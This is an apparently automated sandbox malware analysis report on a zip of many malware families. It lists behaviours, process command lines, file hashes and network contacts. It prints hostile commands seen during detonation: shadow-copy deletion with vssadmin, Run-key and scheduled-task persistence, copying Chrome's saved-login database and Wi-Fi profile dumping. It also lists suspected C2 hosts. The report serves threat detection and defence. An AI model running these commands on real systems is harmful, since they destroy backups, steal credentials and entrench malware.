Malware Analysis Report

2025-01-02 13:37

Sample ID 241202-a81vwswlaj
Target 241105-dtxrgatbpg_pw_infected.zip
SHA256 38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66
Tags
smokeloader backdoor discovery trojan agenttesla danabot formbook gozi 86920224 w9z agilenet banker botnet cryptone defense_evasion execution impact keylogger packer ransomware rat rezer0 rm3 spyware stealer persistence upx revengerat zloader hakbit credential_access evasion asyncrat babylonrat darkcomet njrat warzonerat 2020nov1 null infostealer privilege_escalation hawkeye collection xdsddd victime main 26.02.2020 25/03 samay 09/04 07/04 305419896 insert-coin yt system hacked hack cobaltstrike zeppelin xred modiloader dharma raccoon i0qi
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

38bc13ef112b2f17d4d1a80243fac6a521b5d58228984aae0752d79487fa3b66

Threat Level: Known bad

The file 241105-dtxrgatbpg_pw_infected.zip was found to be: Known bad.

Malicious Activity Summary

smokeloader backdoor discovery trojan agenttesla danabot formbook gozi 86920224 w9z agilenet banker botnet cryptone defense_evasion execution impact keylogger packer ransomware rat rezer0 rm3 spyware stealer persistence upx revengerat zloader hakbit credential_access evasion asyncrat babylonrat darkcomet njrat warzonerat 2020nov1 null infostealer privilege_escalation hawkeye collection xdsddd victime main 26.02.2020 25/03 samay 09/04 07/04 305419896 insert-coin yt system hacked hack cobaltstrike zeppelin xred modiloader dharma raccoon i0qi

Revengerat family

WarzoneRat, AveMaria

Darkcomet family

Babylon RAT

Raccoon family

Warzonerat family

RevengeRat Executable

Hawkeye family

Hakbit family

Dharma

Modiloader family

RevengeRAT

AsyncRat

Babylonrat family

HawkEye

Formbook

Formbook family

Modifies WinLogon for persistence

Zeppelin family

AgentTesla

Raccoon Stealer V1 payload

ModiLoader Second Stage

Zloader, Terdot, DELoader, ZeusSphinx

njRAT/Bladabindi

Cobaltstrike family

Disables service(s)

Xred family

Dharma family

Zloader family

Raccoon

Hakbit

Gozi family

Danabot x86 payload

Danabot family

Danabot

Smokeloader family

Asyncrat family

Gozi

Detects Zeppelin payload

SmokeLoader

Njrat family

Darkcomet

Agenttesla family

Deletes shadow copies

Renames multiple (57) files with added filename extension

Async RAT payload

Renames multiple (188) files with added filename extension

NirSoft MailPassView

Detected Nirsoft tools

Formbook payload

Warzone RAT payload

CryptOne packer

ReZer0 packer

AgentTesla payload

NirSoft WebBrowserPassView

RevengeRat Executable

Disables RegEdit via registry modification

Downloads MZ/PE file

Disables Task Manager via registry modification

Modifies Windows Firewall

Drops file in Drivers directory

Reads user/profile data of web browsers

Obfuscated with Agile.Net obfuscator

Checks computer location settings

Loads dropped DLL

Modifies file permissions

Deletes itself

Drops startup file

Executes dropped EXE

Uses the VBS compiler for execution

Credentials from Password Stores: Windows Credential Manager

Command and Scripting Interpreter: PowerShell

Adds Run key to start application

Drops desktop.ini file(s)

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

UPX packed file

AutoIT Executable

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Drops file in Program Files directory

System Location Discovery: System Language Discovery

Unsigned PE

Program crash

System Network Configuration Discovery: Internet Connection Discovery

Event Triggered Execution: Netsh Helper DLL

Enumerates physical storage devices

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

NSIS installer

Kills process with taskkill

Scheduled Task/Job: Scheduled Task

Suspicious behavior: MapViewOfSection

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Interacts with shadow copies

Checks SCSI registry key(s)

Delays execution with timeout.exe

Opens file in notepad (likely ransom note)

Modifies registry class

Suspicious behavior: CmdExeWriteProcessMemorySpam

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-02 00:54

Signatures

Cobaltstrike family

cobaltstrike

Detects Zeppelin payload

Description Indicator Process Target
N/A N/A N/A N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A

Modiloader family

modiloader

Njrat family

njrat

RevengeRat Executable

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Revengerat family

revengerat

Xred family

xred

Zeppelin family

zeppelin

Zloader family

zloader

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:58

Platform

win7-20240729-en

Max time kernel

117s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 588 set thread context of 740 N/A C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe

"C:\Users\Admin\AppData\Local\Temp\2019-09-02_22-41-10.exe"

Network

N/A

Files

memory/740-2-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/740-6-0x0000000000400000-0x000000000040A000-memory.dmp

memory/588-5-0x0000000000020000-0x000000000002B000-memory.dmp

memory/740-4-0x0000000000400000-0x000000000040A000-memory.dmp

memory/588-1-0x00000000009F0000-0x0000000000AF0000-memory.dmp

memory/740-12-0x0000000000400000-0x000000000040A000-memory.dmp

\Users\Admin\AppData\Local\Temp\D47F.tmp

MD5 d124f55b9393c976963407dff51ffa79
SHA1 2c7bbedd79791bfb866898c85b504186db610b5d
SHA256 ea1e16247c848c8c171c4cd1fa17bc5a018a1fcb0c0dac25009066b6667b8eef
SHA512 278fe3a4b1fbbe700e4f4483b610133e975e36e101455661d5197bd892a68839b9d555499040d200c92aefa9e3819380e395c0cd85d5fc845c6364d128a8cf06

Analysis: behavioral12

Detonation Overview

Submitted

2024-12-02 00:53

Reported

2024-12-02 00:59

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Danabot

trojan banker danabot

Danabot family

danabot

Danabot x86 payload

botnet
Description Indicator Process Target
N/A N/A N/A N/A

Formbook

trojan spyware stealer formbook

Formbook family

formbook

Gozi

banker trojan gozi

Gozi family

gozi

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

CryptOne packer

cryptone packer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Deletes shadow copies

ransomware defense_evasion impact execution

Formbook payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ReZer0 packer

rezer0
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\31.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\4.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3108 set thread context of 1780 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 1780 set thread context of 3528 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\31.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\3.exe N/A

System Network Configuration Discovery: Wi-Fi Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\2.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 208 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 208 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\31.exe C:\Windows\system32\cmd.exe
PID 4652 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 4652 wrote to memory of 1140 N/A C:\Windows\system32\cmd.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 4652 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4652 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4652 wrote to memory of 3108 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4652 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4652 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 4652 wrote to memory of 1688 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\3.exe
PID 3108 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3108 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 3108 wrote to memory of 1780 N/A C:\Users\Admin\AppData\Roaming\2.exe C:\Users\Admin\AppData\Roaming\2.exe
PID 4652 wrote to memory of 1156 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4652 wrote to memory of 1156 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 4652 wrote to memory of 1156 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\4.exe
PID 3528 wrote to memory of 1460 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\mstsc.exe
PID 3528 wrote to memory of 1460 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\mstsc.exe
PID 3528 wrote to memory of 1460 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\mstsc.exe
PID 4652 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 4652 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe
PID 4652 wrote to memory of 4660 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\5.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\31.exe

"C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C3EC.tmp\C3ED.tmp\C3EE.bat C:\Users\Admin\AppData\Local\Temp\31.exe"

C:\Program Files\Java\jre-1.8\bin\javaw.exe

"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\1.jar"

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\4.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Users\Admin\AppData\Roaming\2.exe

C:\Windows\SysWOW64\mstsc.exe

"C:\Windows\SysWOW64\mstsc.exe"

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\5.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\6.exe

C:\Users\Admin\AppData\Roaming\7.exe

C:\Users\Admin\AppData\Roaming\7.exe

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\8.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Users\Admin\AppData\Roaming\9.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Users\Admin\AppData\Roaming\10.exe

C:\Users\Admin\AppData\Roaming\10.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\2.exe"

C:\Users\Admin\AppData\Roaming\11.exe

C:\Users\Admin\AppData\Roaming\11.exe

C:\Users\Admin\AppData\Roaming\12.exe

C:\Users\Admin\AppData\Roaming\12.exe

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /f /v feeed /t REG_SZ /d C:\Windows\system32\pcalua.exe" -a C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\3.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Users\Admin\AppData\Roaming\14.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\15.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Users\Admin\AppData\Roaming\16.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Users\Admin\AppData\Roaming\17.exe

C:\Users\Admin\AppData\Roaming\17.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnLKhBlJfQ" /XML "C:\Users\Admin\AppData\Local\Temp\tmpF482.tmp"

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\18.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Users\Admin\AppData\Roaming\13.exe

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\4.dll f1 C:\Users\Admin\AppData\Roaming\4.exe@1156

C:\Users\Admin\AppData\Roaming\19.exe

C:\Users\Admin\AppData\Roaming\19.exe

C:\Windows\SysWOW64\chkdsk.exe

"C:\Windows\SysWOW64\chkdsk.exe"

C:\Users\Admin\AppData\Roaming\11.exe

"{path}"

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1156 -ip 1156

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\4.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 480

C:\Windows\SysWOW64\raserver.exe

"C:\Windows\SysWOW64\raserver.exe"

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\18.exe"

C:\Users\Admin\AppData\Roaming\21.exe

C:\Users\Admin\AppData\Roaming\21.exe

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\11.exe"

C:\Users\Admin\AppData\Roaming\22.exe

C:\Users\Admin\AppData\Roaming\22.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 4688 -ip 4688

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\20.exe

C:\Users\Admin\AppData\Roaming\feeed.exe

"C:\Users\Admin\AppData\Roaming\feeed.exe"

C:\Users\Admin\AppData\Roaming\23.exe

C:\Users\Admin\AppData\Roaming\23.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4688 -s 612

C:\Users\Admin\AppData\Roaming\21.exe

"{path}"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wWTxgR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B3A.tmp"

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"

C:\Users\Admin\AppData\Roaming\24.exe

C:\Users\Admin\AppData\Roaming\24.exe

C:\Windows\SysWOW64\cmd.exe

/c copy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\Admin\AppData\Local\Temp\DB1" /V

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Users\Admin\AppData\Roaming\9.exe

"{path}"

C:\Users\Admin\AppData\Roaming\25.exe

C:\Users\Admin\AppData\Roaming\25.exe

C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe

"C:\Users\Admin\AppData\Local\Temp\Trainbandanigon6\Styltendeschris.exe"

C:\Users\Admin\AppData\Roaming\26.exe

C:\Users\Admin\AppData\Roaming\26.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\24.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe

"C:\Users\Admin\AppData\Local\Temp\InstallUtil.exe"

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Roaming\28.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Users\Admin\AppData\Roaming\29.exe

C:\Users\Admin\AppData\Roaming\30.exe

C:\Users\Admin\AppData\Roaming\30.exe

C:\Users\Admin\AppData\Roaming\31.exe

C:\Users\Admin\AppData\Roaming\31.exe

C:\Program Files (x86)\Internet Explorer\ielowutil.exe

"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:10140 CREDAT:17410 /prefetch:2

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"

C:\Program Files (x86)\Uld6hzlc8\autochkf0h0.exe

"C:\Program Files (x86)\Uld6hzlc8\autochkf0h0.exe"

C:\Program Files (x86)\Uld6hzlc8\autochkf0h0.exe

"C:\Program Files (x86)\Uld6hzlc8\autochkf0h0.exe"

C:\Windows\system32\mode.com

mode con cp select=1251

C:\Windows\SysWOW64\regsvr32.exe

C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Roaming\29.dll f1 C:\Users\Admin\AppData\Roaming\29.exe@11116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 11116 -ip 11116

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Roaming\29.dll,f0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 11116 -s 472

C:\Users\Admin\AppData\Roaming\27.exe

C:\Users\Admin\AppData\Roaming\27.exe /C

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\qATVyEXYNcqQZF" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5819.tmp"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Users\Admin\AppData\Roaming\26.exe

"{path}"

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\SysWOW64\netsh.exe

"netsh" wlan show profile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

"C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v4.0.30319\\\\MSBuild.exe"

C:\Users\Admin\AppData\Roaming\Microsoft\Egkvryqiccce\suqxdsoo.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Egkvryqiccce\suqxdsoo.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn smdiddz /tr "\"C:\Users\Admin\AppData\Roaming\27.exe\" /I smdiddz" /SC ONCE /Z /ST 01:00 /ET 01:12

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 nodejs.org udp
US 104.20.23.46:443 nodejs.org tcp
US 8.8.8.8:53 46.23.20.104.in-addr.arpa udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 227.243.59.199.in-addr.arpa udp
US 199.59.243.227:443 tcp
US 8.8.8.8:53 ffvgdsv.ug udp
US 199.59.243.227:443 tcp
US 199.59.243.227:443 tcp
NL 193.34.166.247:443 tcp
NL 185.45.193.50:443 tcp
US 8.8.8.8:53 247.166.34.193.in-addr.arpa udp
US 8.8.8.8:53 ffvgdsv.ug udp
US 8.8.8.8:53 www.randomviews1.com udp
US 8.8.8.8:53 ffvgdsv.ug udp
JP 162.43.116.10:80 www.randomviews1.com tcp
US 8.8.8.8:53 10.116.43.162.in-addr.arpa udp
